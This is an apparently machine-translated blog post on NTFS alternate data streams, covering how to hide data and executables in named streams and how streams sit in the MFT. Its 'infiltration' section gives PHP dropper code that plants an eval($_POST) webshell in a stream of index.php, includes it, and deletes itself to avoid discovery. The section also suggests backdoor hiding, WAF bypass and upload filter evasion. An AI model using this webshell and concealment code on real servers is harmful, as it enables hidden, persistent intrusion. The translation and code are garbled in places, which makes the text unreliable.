File parasitic-The search for the host's non-return (NTFS file stream is actually applied)

Let's take a look at the NTFS file stream today:

The NTFS file system implements the multi-file stream feature, where one file by default uses an unnamed file stream, and other named streams of files are created, and Windows Explorer does not display the named file stream of the files by default, and the named streams are functionally consistent with the unnamed file streams that are used by default. Can even be used to start a program

NTFS file stream generation steps:
1. We open a CMD command prompt under any NTFS partition, enter the echo mstlab>>mst.txt:test.txt, A file named Mst.txt is generated under the current directory, but the file size is 0 bytes and nothing is opened.


Only input command: Notepad mst.txt:test.txt to see Mstlab written

2. In the command above, Mst.txt may not exist, or it can be a saved file, the file format does not matter, whether it is a. txt or. jpg|. exe|. ASP line B.txt can also optionally specify the file name and suffix name. (Any text information can be hidden in any file, as long as the virtual file name (i.e., test.txt) after the colon is not disclosed, others will not see the hidden information at all).

3. Files containing hidden information can still continue to hide other content, compared to the above example, we can still use the command echo mstlab1>> mst.txt : Test1.txt creates a new stream file of hidden information for mst.txt, and MSTLAB1 this message when the command Notepad mst.txt:test1.txt open. And Mstlab still exists in the mst.txt:test.txt without any influence whatsoever.
 
So the host mst.txt is successfully parasitic by test.txt and test1.txt, and the subtle relationship here is obvious, the host disappears and the parasite disappears

NTFS features and rationale analysis:
Feature 1:
Experiment Tool Download: https://github.com/wangyongxina/filestreams/blob/master/release/ release.7z
Tool usage notes:
create      creating a file stream
enum        Enumerate file streams
delete      delete a file stream
write        Write content to a file stream
append     add file to file stream
launch      execute the contents of the file stream
dump       read the contents of the file stream


Let's take the previous step to zero and look at Mst.txt again:

The default file stream here verifies the beginning of the first sentence, using the file stream as the name.


At the beginning of the experiment, we first use FileStreams.exe to create a file stream vkey:
FileStreams.exe Create Mst.txt Vkey


Then write the content to the file stream vkey

FileStreams.exe Create mst.txt vkey content

To view the contents of the file stream vkey

FileStreams.exe Dump Mst.txt vkey 14
Where the 14 comes from, believe that the wise you can understand. (File stream vkey size 14)


So, at the beginning, the file stream can be used to start the program, let's try it out:
1. Add file to file stream vkey:
FileStreams.exe Append mst.txt vkey C:\Users\gh0stkey\Desktop\test\FileStreams.exe

2. Look at the contents of the file stream vkey, here is the first 100 bytes of content:
FileStreams.exe Dump Mst.txt vkey 100

3. Execute file Stream vkey:

Smooth execution of the C:\Users\gh0stkey\Desktop\test\FileStreams.exe this file.
Feature 2
To create an empty file automatically:


The host is automatically created and then parasitic.


Creating a file stream without the original file will automatically create an empty file.
Principle Analysis:
Well, now we have a preliminary understanding of the nature of the file stream. Let's take a look at the NTFS file stream implementation principle:


such as file size, file creation time, file modification time, filename, file content, etc. are organized into attributes to store, NTFS defines a sequence of file attributes:

Detailed description can be searched ntfs3g, these properties are uniformly organized on the MFT (Master File Table) of NTFS, each MFT size 1024 bytes, the MFT $data property is the file stream mentioned earlier, usually contains several different names of $ The Data property indicates that there is more than one file stream in the file, and that the Winhex opens 1.txt to 1.txt of the MFT, and we actually look at how NTFS is organized:

Can see the file stream test2 data is stored directly on the MFT, because the test2 data is small, and testexe data is not obvious, because the Testexe data is relatively large, the MFT is stored in the cluster information.


The use of infiltration:

Webshell Backdoor Hide:

<?phpexec (' Echo ' <?php @eval ($_post[key]);? > ">>index.php:key.php"); $key = <<<keyecho "<?php include ' index.php:key.php ';? > ">>a.phpkey;exec ($key); $url = $_server[' php_self '); $filename = substr ($url, Strrpos ($url, '/') +1); @unlink ( $filename);? >

Why do you write this? First we know that the default home page of the site is index.php, so we used the first paragraph of code:

EXEC (' echo ' <?php @eval ($_post[key]);? > ">>index.php:key.php");

Write a word directly to key.php in this file stream.


Second, the file stream is not possible to execute directly, but PHP can use the Include function, so the second piece of code is generated:

$key = <<<keyecho "<?php include ' index.php:key.php ';? > ">>a.phpkey;exec ($key);

Finally, in order not to be found to delete the file itself, the code is out:


$url = $_server[' php_self ');
$filename = substr ($url, Strrpos ($url, '/') +1);
@unlink ($filename);


Software Backdoor hiding:
Use the feature 1 to write a code in the background to automatically run this file stream.

ByPass WAF:
Testing the next few WAF can still be bypassed.
More chicken:

You need to have a file containing the line.

Of course some limitations limit the parasite to get sovereignty:
Use the following default stream substitution feature to upload a file with the file name 1.php: bypass the suffix limit.

Of course you can also make a persistent webshell backdoor, and then use the include to include it:

Default Stream substitution:

The default stream, which is the host itself, can completely devour the host and become the host.

It's a very interesting way to be aware of the unconventional.

For example, we perform the echo Xxxx>>1.txt directly:
To replace the default stream:

Of course, if the host does not exist, it will create the host and devour the host, thereby becoming the host.

This method is perfectly applied in a limited command execution.

Summarize:
Original file = host, file stream = parasite. Friends according to the basis of this article to continue in-depth research, the file stream applied to various operations, creating a "wretched" stream.

File Parasitic-the non-return of the Search host (NTFS file stream is actually applied)